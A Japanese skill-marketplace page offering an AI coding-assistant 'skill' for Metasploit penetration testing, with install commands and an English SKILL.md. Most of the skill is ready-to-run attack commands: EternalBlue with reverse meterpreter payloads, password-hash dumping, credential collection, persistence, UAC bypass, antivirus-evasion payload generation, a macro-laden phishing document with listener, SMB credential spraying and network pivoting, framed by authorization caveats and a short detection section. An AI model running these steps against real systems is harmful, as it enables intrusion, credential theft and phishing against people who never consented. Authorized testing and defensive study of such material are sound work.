jpskill.com
💼 ビジネス コミュニティ

pentest-metasploit

Metasploit Frameworkを活用し、脆弱性検証やセキュリティ評価、侵入テストなど、許可された範囲内でセキュリティに関する様々な検証やテスト、攻撃後のワークフロー開発などを効率的に行うSkill。

📜 元の英語説明(参考)

Penetration testing framework for exploit development, vulnerability validation, and authorized security assessments using Metasploit Framework. Use when: (1) Validating vulnerabilities in authorized security assessments, (2) Demonstrating exploit impact for security research, (3) Testing defensive controls in controlled environments, (4) Conducting authorized penetration tests with proper scoping and authorization, (5) Developing post-exploitation workflows for red team operations.

🇯🇵 日本人クリエイター向け解説

一言でいうと

Metasploit Frameworkを活用し、脆弱性検証やセキュリティ評価、侵入テストなど、許可された範囲内でセキュリティに関する様々な検証やテスト、攻撃後のワークフロー開発などを効率的に行うSkill。

※ jpskill.com 編集部が日本のビジネス現場向けに補足した解説です。Skill本体の挙動とは独立した参考情報です。

⚡ おすすめ: コマンド1行でインストール(60秒)

下記のコマンドをコピーしてターミナル(Mac/Linux)または PowerShell(Windows)に貼り付けてください。 ダウンロード → 解凍 → 配置まで全自動。

🍎 Mac / 🐧 Linux 
mkdir -p ~/.claude/skills && cd ~/.claude/skills && curl -L -o pentest-metasploit.zip https://jpskill.com/download/17032.zip && unzip -o pentest-metasploit.zip && rm pentest-metasploit.zip
🪟 Windows (PowerShell) 
$d = "$env:USERPROFILE\.claude\skills"; ni -Force -ItemType Directory $d | Out-Null; iwr https://jpskill.com/download/17032.zip -OutFile "$d\pentest-metasploit.zip"; Expand-Archive "$d\pentest-metasploit.zip" -DestinationPath $d -Force; ri "$d\pentest-metasploit.zip"

完了後、Claude Code を再起動 → 普通に「動画プロンプト作って」のように話しかけるだけで自動発動します。

💾 手動でダウンロードしたい(コマンドが難しい人向け)
  1. 1. 下の青いボタンを押して pentest-metasploit.zip をダウンロード
  2. 2. ZIPファイルをダブルクリックで解凍 → pentest-metasploit フォルダができる
  3. 3. そのフォルダを C:\Users\あなたの名前\.claude\skills\(Win)または ~/.claude/skills/(Mac)へ移動
  4. 4. Claude Code を再起動
⬇ .zip でダウンロード(推奨) ⬇ .skill 形式(上級者用) 元のソース ↗

⚠️ ダウンロード・利用は自己責任でお願いします。当サイトは内容・動作・安全性について責任を負いません。

🎯 このSkillでできること

下記の説明文を読むと、このSkillがあなたに何をしてくれるかが分かります。Claudeにこの分野の依頼をすると、自動で発動します。

📦 インストール方法 (3ステップ)

  1. 1. 上の「ダウンロード」ボタンを押して .skill ファイルを取得
  2. 2. ファイル名の拡張子を .skill から .zip に変えて展開(macは自動展開可)
  3. 3. 展開してできたフォルダを、ホームフォルダの .claude/skills/ に置く
    • · macOS / Linux: ~/.claude/skills/
    • · Windows: %USERPROFILE%\.claude\skills\

Claude Code を再起動すれば完了。「このSkillを使って…」と話しかけなくても、関連する依頼で自動的に呼び出されます。

詳しい使い方ガイドを見る →
最終更新
2026-05-18
取得日時
2026-05-18
同梱ファイル
5

📖 Skill本文(日本語訳)

※ 原文(英語/中国語)を Gemini で日本語化したものです。Claude 自身は原文を読みます。誤訳がある場合は原文をご確認ください。

Metasploit Framework ペネトレーションテスト

概要

Metasploit Framework は、ペネトレーションテスト、脆弱性検証、エクスプロイト開発のための業界標準プラットフォームです。このスキルでは、エクスプロイト、ポストエクスプロイト、ペイロード配信など、許可された攻撃的セキュリティオペレーションのための構造化されたワークフローを提供します。

重要: このスキルは、許可されたセキュリティテストのみを対象としています。ペネトレーションテスト活動を行う前に、必ず適切な許可、スコープ文書、および法的遵守を確認してください。

クイックスタート

Metasploit コンソールを初期化し、データベース接続を確認します。

# PostgreSQL データベースを起動します (ワークスペース管理に必要)
sudo systemctl start postgresql

# Metasploit データベースを初期化します
msfdb init

# Metasploit コンソールを起動します
msfconsole

# データベース接続を確認します
msf6 > db_status

コアワークフロー

ペネトレーションテストワークフロー

進捗状況: [ ] 1. 許可とスコープの確認 [ ] 2. ワークスペースとターゲット列挙の構成 [ ] 3. 適切なエクスプロイトの特定と選択 [ ] 4. ペイロードとエクスプロイトオプションの構成 [ ] 5. 適切なドキュメントによるエクスプロイトの実行 [ ] 6. ポストエクスプロイト活動の実施 (許可されている場合) [ ] 7. 影響評価を含む調査結果の文書化 [ ] 8. アーティファクトとセッションのクリーンアップ

各ステップを体系的に進めてください。完了した項目にチェックを入れてください。

1. 許可の検証

重要: テスト活動を行う前に:

  • アセット所有者からの書面による許可を確認する
  • スコープ文書で対象範囲内のターゲットを確認する
  • テストが許可されている IP 範囲とシステムを確認する
  • 許可されているテスト期間とブラックアウト期間を確認する
  • 緊急エスカレーションの連絡先を文書化する

2. ワークスペースのセットアップ

エンゲージメントのために隔離されたワークスペースを作成します。

msf6 > workspace -a <engagement-name>
msf6 > workspace <engagement-name>
msf6 > db_nmap -sV -sC -O <target-ip-range>

既存の偵察データをインポートします。

msf6 > db_import /path/to/nmap-scan.xml
msf6 > hosts
msf6 > services

3. エクスプロイトの選択

列挙されたサービスに基づいて、関連するエクスプロイトを検索します。

msf6 > search type:exploit platform:windows <service-name>
msf6 > search cve:<cve-id>
msf6 > search eternalblue

エクスプロイトの適合性を評価します。

  • 信頼性ランキング: Excellent > Great > Good > Normal > Average
  • 安定性: クラッシュの可能性を確認する
  • ターゲット互換性: OS バージョンとアーキテクチャを確認する
  • 必要な認証情報: 認証が必要かどうかを判断する

4. エクスプロイトの構成

選択したエクスプロイトモジュールを構成します。

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS <target-ip>
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RPORT 445

# ペイロードを構成する
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_https
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST <listener-ip>
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 443

# 構成を検証する
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
msf6 exploit(windows/smb/ms17_010_eternalblue) > check

5. エクスプロイトの実行

ロギングを使用してエクスプロイトを実行します。

# ロギングを有効にする
msf6 exploit(windows/smb/ms17_010_eternalblue) > spool /path/to/logs/engagement-<date>.log

# エクスプロイトを実行する
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

# または、自動インタラクションなしで実行する
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit -j

エクスプロイトの結果:

  • セッションが開かれた: エクスプロイトが成功しました。ポストエクスプロイトに進みます。
  • エクスプロイトが失敗した: ターゲットの互換性を確認し、別のエクスプロイトを試してください。
  • ターゲットに脆弱性がない: 調査結果を文書化し、次のターゲットに進みます。
  • サービスがクラッシュした: 安定性の問題を文書化し、許可されている場合はサービスの復元を試みます。

6. ポストエクスプロイト (許可された活動のみ)

セッションが確立されたら、許可されたポストエクスプロイトを実施します。

# アクティブなセッションを一覧表示する
msf6 > sessions -l

# セッションを操作する
msf6 > sessions -i <session-id>

# システム情報を収集する
meterpreter > sysinfo
meterpreter > getuid
meterpreter > getprivs

# ネットワーク構成を確認する
meterpreter > ipconfig
meterpreter > route

# 実行中のプロセスを列挙する
meterpreter > ps

# セキュリティコントロールを確認する
meterpreter > run post/windows/gather/enum_av_excluded
meterpreter > run post/windows/gather/enum_logged_on_users

一般的なポストエクスプロイトモジュール:

  • post/windows/gather/hashdump - パスワードハッシュを抽出します (SYSTEM 権限が必要です)
  • post/multi/recon/local_exploit_suggester - 権限昇格の機会を特定します
  • post/windows/gather/credentials/credential_collector - 保存された認証情報を収集します
  • post/windows/manage/persistence_exe - 永続性を確立します (明示的に許可されている場合)

7. 権限昇格

権限昇格が許可されている場合:

# 昇格ベクトルを特定する
meterpreter > run post/multi/recon/local_exploit_suggester

# 安定したプロセスに移行する
meterpreter > ps
meterpreter > migrate <stable-process-pid>

# 権限昇格を試みる
meterpreter > getsystem
meterpreter > getuid

手動による権限昇格ワークフロー:

  1. 現在のセッションをバックグラウンドに移動します: background
  2. 昇格モジュールを選択します: use exploit/windows/local/<escalation-module>
  3. セッションを設定します: set SESSION <session-id>
  4. エクスプロイトを実行します: exploit

8. 水平展開

許可された内部ペネトレーションテストの場合:

# ネットワークを列挙する
meterpreter > run post/windows/gather/arp_scanner RHOSTS=<internal-subnet>
meterpreter > run auxiliary/scanner/smb/smb_version

# 侵害されたホストを介してピボットする
meterpreter > run autoroute -s <internal-subnet>/24

# 侵害されたホストをプロキシとして使用する
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVPORT 1080
msf6 auxiliary(server/socks_proxy) > run -j

ピボット用に proxychains を構成します。

# Edi
📜 原文 SKILL.md(Claudeが読む英語/中国語)を展開

Metasploit Framework Penetration Testing

Overview

Metasploit Framework is the industry-standard platform for penetration testing, vulnerability validation, and exploit development. This skill provides structured workflows for authorized offensive security operations including exploitation, post-exploitation, and payload delivery.

IMPORTANT: This skill is for AUTHORIZED security testing only. Always ensure proper authorization, scoping documents, and legal compliance before conducting penetration testing activities.

Quick Start

Initialize Metasploit console and verify database connectivity:

# Start PostgreSQL database (required for workspace management)
sudo systemctl start postgresql

# Initialize Metasploit database
msfdb init

# Launch Metasploit console
msfconsole

# Verify database connection
msf6 > db_status

Core Workflow

Penetration Testing Workflow

Progress: [ ] 1. Verify authorization and scope [ ] 2. Configure workspace and target enumeration [ ] 3. Identify and select appropriate exploits [ ] 4. Configure payload and exploit options [ ] 5. Execute exploitation with proper documentation [ ] 6. Conduct post-exploitation activities (if authorized) [ ] 7. Document findings with impact assessment [ ] 8. Clean up artifacts and sessions

Work through each step systematically. Check off completed items.

1. Authorization Verification

CRITICAL: Before any testing activities:

  • Confirm written authorization from asset owner
  • Review scope document for in-scope targets
  • Verify IP ranges and systems authorized for testing
  • Confirm allowed testing windows and blackout periods
  • Document point of contact for emergency escalation

2. Workspace Setup

Create isolated workspace for engagement:

msf6 > workspace -a <engagement-name>
msf6 > workspace <engagement-name>
msf6 > db_nmap -sV -sC -O <target-ip-range>

Import existing reconnaissance data:

msf6 > db_import /path/to/nmap-scan.xml
msf6 > hosts
msf6 > services

3. Exploit Selection

Search for relevant exploits based on enumerated services:

msf6 > search type:exploit platform:windows <service-name>
msf6 > search cve:<cve-id>
msf6 > search eternalblue

Evaluate exploit suitability:

  • Reliability Ranking: Excellent > Great > Good > Normal > Average
  • Stability: Check crash potential
  • Target Compatibility: Verify OS version and architecture
  • Required Credentials: Determine if authentication needed

4. Exploit Configuration

Configure selected exploit module:

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS <target-ip>
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RPORT 445

# Configure payload
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_https
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST <listener-ip>
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 443

# Validate configuration
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
msf6 exploit(windows/smb/ms17_010_eternalblue) > check

5. Exploitation Execution

Execute exploit with logging:

# Enable logging
msf6 exploit(windows/smb/ms17_010_eternalblue) > spool /path/to/logs/engagement-<date>.log

# Run exploit
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

# Or run without auto-interaction
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit -j

Exploitation outcomes:

  • Session opened: Successful exploitation, proceed to post-exploitation
  • Exploit failed: Review target compatibility, try alternative exploits
  • Target not vulnerable: Document finding, move to next target
  • Service crash: Document stability issue, attempt service restoration if authorized

6. Post-Exploitation (Authorized Activities Only)

Once session established, conduct authorized post-exploitation:

# List active sessions
msf6 > sessions -l

# Interact with session
msf6 > sessions -i <session-id>

# Gather system information
meterpreter > sysinfo
meterpreter > getuid
meterpreter > getprivs

# Check network configuration
meterpreter > ipconfig
meterpreter > route

# Enumerate running processes
meterpreter > ps

# Check security controls
meterpreter > run post/windows/gather/enum_av_excluded
meterpreter > run post/windows/gather/enum_logged_on_users

Common post-exploitation modules:

  • post/windows/gather/hashdump - Extract password hashes (requires SYSTEM privileges)
  • post/multi/recon/local_exploit_suggester - Identify privilege escalation opportunities
  • post/windows/gather/credentials/credential_collector - Gather stored credentials
  • post/windows/manage/persistence_exe - Establish persistence (if explicitly authorized)

7. Privilege Escalation

If authorized for privilege escalation:

# Identify escalation vectors
meterpreter > run post/multi/recon/local_exploit_suggester

# Migrate to stable process
meterpreter > ps
meterpreter > migrate <stable-process-pid>

# Attempt privilege escalation
meterpreter > getsystem
meterpreter > getuid

Manual privilege escalation workflow:

  1. Background current session: background
  2. Select escalation module: use exploit/windows/local/<escalation-module>
  3. Set session: set SESSION <session-id>
  4. Run exploit: exploit

8. Lateral Movement

For authorized internal penetration tests:

# Enumerate network
meterpreter > run post/windows/gather/arp_scanner RHOSTS=<internal-subnet>
meterpreter > run auxiliary/scanner/smb/smb_version

# Pivot through compromised host
meterpreter > run autoroute -s <internal-subnet>/24

# Use compromised host as proxy
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVPORT 1080
msf6 auxiliary(server/socks_proxy) > run -j

Configure proxychains for pivoting:

# Edit /etc/proxychains4.conf
socks4 127.0.0.1 1080

# Run tools through pivot
proxychains nmap -sT -Pn <internal-target>

Security Considerations

Authorization & Legal Compliance

  • Written Authorization: Maintain signed penetration testing agreement
  • Scope Adherence: Only test explicitly authorized systems and networks
  • Data Protection: Handle discovered data per engagement rules of engagement
  • Incident Response: Immediately report critical findings per escalation procedures
  • Evidence Handling: Maintain chain of custody for forensic evidence

Operational Security

  • Callback Infrastructure: Use dedicated, authorized callback servers
  • Attribution Prevention: Avoid personal infrastructure or identifiable indicators
  • Traffic Encryption: Use encrypted payloads (HTTPS, DNS tunneling)
  • Artifact Cleanup: Remove exploitation artifacts post-engagement
  • Session Management: Close sessions cleanly to avoid detection alerts

Audit Logging

Log all penetration testing activities:

  • Timestamp of exploitation attempts
  • Source and destination systems
  • Exploit modules and payloads used
  • Commands executed in sessions
  • Data accessed or exfiltrated
  • Privilege escalation attempts
  • Lateral movement actions

Compliance

  • PTES: Penetration Testing Execution Standard compliance
  • OWASP: Alignment with application security testing methodology
  • MITRE ATT&CK: Map TTPs to ATT&CK framework for threat modeling
  • PCI-DSS 11.3: Penetration testing for payment card environments
  • SOC2: Security testing for service organization controls

Common Patterns

Pattern 1: Web Application Exploitation

msf6 > use exploit/multi/http/apache_struts2_content_type_ognl
msf6 exploit(...) > set RHOSTS <web-server>
msf6 exploit(...) > set TARGETURI /vulnerable-app
msf6 exploit(...) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
msf6 exploit(...) > exploit

Pattern 2: Database Server Exploitation

# SQL Server exploitation
msf6 > use exploit/windows/mssql/mssql_payload
msf6 exploit(mssql_payload) > set RHOSTS <sql-server>
msf6 exploit(mssql_payload) > set USERNAME sa
msf6 exploit(mssql_payload) > set PASSWORD <password>
msf6 exploit(mssql_payload) > exploit

Pattern 3: Phishing Campaign Delivery

# Generate malicious document
msf6 > use exploit/windows/fileformat/office_word_macro
msf6 exploit(office_word_macro) > set FILENAME report.docm
msf6 exploit(office_word_macro) > set PAYLOAD windows/meterpreter/reverse_https
msf6 exploit(office_word_macro) > set LHOST <callback-server>
msf6 exploit(office_word_macro) > exploit

# Set up listener
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_https
msf6 exploit(multi/handler) > set LHOST <callback-server>
msf6 exploit(multi/handler) > set LPORT 443
msf6 exploit(multi/handler) > exploit -j

Pattern 4: Credential Spraying

msf6 > use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > set RHOSTS file:/path/to/targets.txt
msf6 auxiliary(scanner/smb/smb_login) > set SMBUser Administrator
msf6 auxiliary(scanner/smb/smb_login) > set SMBPass <common-password>
msf6 auxiliary(scanner/smb/smb_login) > set STOP_ON_SUCCESS true
msf6 auxiliary(scanner/smb/smb_login) > run

Integration Points

CI/CD Integration

Automated vulnerability validation in security pipelines:

# Headless Metasploit resource script
cat > exploit_validation.rc <<EOF
workspace -a ci-validation
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS \${TARGET_IP}
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST \${CALLBACK_IP}
exploit -z
exit
EOF

# Run headless validation
msfconsole -r exploit_validation.rc -o validation_results.txt

Security Tools Integration

  • Nmap Integration: Import reconnaissance data with db_import
  • Cobalt Strike: Export sessions to Cobalt Strike beacons
  • Empire: Handoff sessions to PowerShell Empire framework
  • BloodHound: Combine with Active Directory enumeration
  • Burp Suite: Integrate web vulnerability findings

MITRE ATT&CK Mapping

Map Metasploit activities to ATT&CK framework:

  • Initial Access: T1190 (Exploit Public-Facing Application)
  • Execution: T1059 (Command and Scripting Interpreter)
  • Persistence: T1547 (Boot or Logon Autostart Execution)
  • Privilege Escalation: T1068 (Exploitation for Privilege Escalation)
  • Credential Access: T1003 (OS Credential Dumping)
  • Lateral Movement: T1021 (Remote Services)
  • Collection: T1005 (Data from Local System)
  • Exfiltration: T1041 (Exfiltration Over C2 Channel)

Troubleshooting

Issue: Session Dies Immediately

Causes:

  • Antivirus detection of payload
  • Incompatible payload architecture (x86 vs x64)
  • Firewall blocking callback connection

Solutions:

# Try evasion techniques
msf6 > use evasion/windows/windows_defender_exe
msf6 evasion(...) > set PAYLOAD windows/meterpreter/reverse_https
msf6 evasion(...) > generate -f /path/to/evaded_payload.exe

# Use staged payload instead of stageless
set PAYLOAD windows/meterpreter/reverse_https  # staged
# vs
set PAYLOAD windows/meterpreter_reverse_https  # stageless

# Migrate immediately after session establishment
meterpreter > run post/windows/manage/migrate

Issue: Exploit Fails with "Exploit completed, but no session was created"

Causes:

  • Target not vulnerable
  • Incorrect target version or architecture
  • Payload compatibility issue

Solutions:

# Verify target vulnerability
msf6 exploit(...) > check

# Adjust target manually
msf6 exploit(...) > show targets
msf6 exploit(...) > set TARGET <target-index>

# Try alternative payload
msf6 exploit(...) > show payloads
msf6 exploit(...) > set PAYLOAD <alternative-payload>

Issue: Cannot Escalate Privileges

Solutions:

# Enumerate escalation opportunities
meterpreter > run post/multi/recon/local_exploit_suggester

# Try alternative techniques
meterpreter > getsystem -t 1  # Named Pipe Impersonation
meterpreter > getsystem -t 2  # Named Pipe Impersonation (Admin Drop)
meterpreter > getsystem -t 3  # Token Duplication

# Use UAC bypass if applicable
meterpreter > background
msf6 > use exploit/windows/local/bypassuac_injection
msf6 exploit(bypassuac_injection) > set SESSION <session-id>
msf6 exploit(bypassuac_injection) > exploit

Defensive Considerations

Organizations can detect Metasploit activity by:

  • Network IDS: Signature-based detection of default Metasploit payloads
  • Endpoint Detection: Behavioral analysis of meterpreter process injection
  • Traffic Analysis: Unusual outbound HTTPS connections to non-standard ports
  • Memory Forensics: Detection of reflective DLL injection techniques
  • Log Analysis: Unusual authentication patterns or process execution

Enhance defensive posture:

  • Deploy endpoint detection and response (EDR) solutions
  • Enable PowerShell script block logging
  • Monitor for unusual parent-child process relationships
  • Implement application whitelisting
  • Detect lateral movement with network segmentation and monitoring

References

同梱ファイル

※ ZIPに含まれるファイル一覧。`SKILL.md` 本体に加え、参考資料・サンプル・スクリプトが入っている場合があります。